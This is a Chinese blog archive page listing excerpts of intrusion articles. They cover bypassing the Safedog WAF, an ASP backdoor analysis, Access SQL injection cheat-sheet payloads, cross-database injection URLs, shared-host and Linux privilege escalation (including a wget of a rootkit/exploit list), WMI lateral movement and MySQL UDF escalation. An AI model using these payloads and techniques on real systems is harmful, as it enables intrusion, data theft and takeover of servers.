本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 技术文章

破那个垃圾安全狗技术总汇

2013.01.5 , , No Comments ,

安全狗很牛吗? 无视!! 过安全狗主要过哪几方面: 作者:鬼哥 版权:www.90sec.org 1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲: 1.过注入 方法一:a.asp?aaa=%00&id=sql语句 方法二: a.asp?id=sql语句   里面把安全过滤的...

对邪红色内部ASP小木马后门的分析

2013.01.1 , , 1 Comment ,

在邪红色论坛看到的,标题是《邪红色内部ASP小木马【跨年发布】》 进去看了下介绍,就下载过来研究下,如图是论坛的介绍: 后门地址: 看代码的380行: If MD5(Request("pwd"))=Userpwd or Request("pwd")=Request.ServerVariables("URL") then Session("mgler")=Userpw...

突破防注入的技巧 [转]

2012.12.26 , , No Comments ,

空闲之余在国内外找了一些 bypass 防注入的代码,最后整理成了这个小文章. 让大牛们见笑了。 突破防注入的技巧下载

Access SQL 注入参考手册(小抄),Access Cheat Sheet

2012.12.26 , , No Comments ,

Access SQL注入参考 描述 SQL查询及注释 注释符 Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替: ' UNION SELECT 1,1,1 FROM validTableName%00 语法错误信息 "[Microsoft][Driver ODBC...

虚拟主机提权,调用远程路径去执行CMD

2012.12.26 , , No Comments ,

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"? 原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。 下面是个人的小技巧: 1: 是否大家会想到调用远程路径去执行...

虚拟主机中利用php.exe来跨站

2012.12.26 , , No Comments ,

虚拟主机小技巧 看到现在很多同学在发帖了,https://www.t00ls.net/viewthread ... p;extra=&page=1 看了这贴后我有个技巧跟这个同学的很相似。但是老电脑留在学校了,现在的电脑什么都没有,我只能提一下了。测试成功的同学可以截图看看。 这个方法跟那位同学的方法2很相识。主要是在找不到可执行目录时用来跨站的 前提知道目标...

Access高级玩法经验解说

2012.12.26 , , No Comments ,

1.Access跨库查询. http://www.wooyun.com/news/type.asp?type?id=1 and 1=2 union select 1,2,user,4,5,6 from [C:\root\data\%23db1.asp].admin 条件:分站有注入,知道对方站的路径可以用这个方法来跨库查询. [C:\root\data\%23db1....

【转载】] linux 自动提权perl脚本

2012.12.24 , , No Comments ,

linux各种版本的 exp地址:http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt 使用demo   yaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var....

利用WMI代替psexec—内网入侵(WMIEXEC.vbs)

2012.12.21 , , No Comments ,

0x01 背景 内网渗透中经常用到psexec这个工具,可以很方便的得到一个半交互式的cmd shell。 但是psexec也有一些问题:psexec需要对方开启ADMIN$共享,而且需要安装服务;另外,psexec退出时有可能服务删除失败,这个情况只是偶尔,但是我碰到过。 安装服务会留下明显的日志,而且服务没有删除的风险更大,管理员很容易就会发现。 WMI可以远程执...

PhpMyAdmin UDF 提权

2012.12.18 , , 1 Comment ,

[+]小菜文章,大牛飞过!! 适用环境:PhpMyAdmin 3.x  ,  MySQL>5.1  ,  无Shell  ,  无法爆绝对路径 前提条件: 有MYSQL的ROOT权限 思路:利用NTFS ADS创建 plugin目录 ---- 导出UDF 过程: 查询 select @@basedir  (或者 select @@datadir) 得到MySQL...